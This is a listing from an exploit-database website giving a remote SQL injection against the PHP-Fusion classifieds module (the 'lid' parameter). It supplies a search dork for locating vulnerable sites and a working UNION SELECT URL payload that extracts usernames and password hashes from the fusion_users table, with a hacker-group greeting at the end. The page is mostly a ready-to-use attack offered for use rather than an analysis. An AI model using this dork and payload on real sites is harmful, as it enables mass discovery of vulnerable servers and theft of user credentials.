[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability

Author
boom3rang
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3316
Category
web applications
Date add
26-06-2008
Platform
unsorted
===================================================================
PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability
===================================================================




#################################
Php fusion "classifieds"  SQL-injetion  
#################################

++++++++++++++++++++++++++++
Author     :     boom3rang
++++++++++++++++++++++++++++



----> Remote SQL Injection <------


[+] Dork:                     inurl:"classifieds.php?op=detail_adverts"


[+] Example:  www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]



exploit:
www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--



##########################################
  greetz to:   All my albanian brothers
     =United State of Albania = 
##########################################



#  0day.today [2024-12-25]  #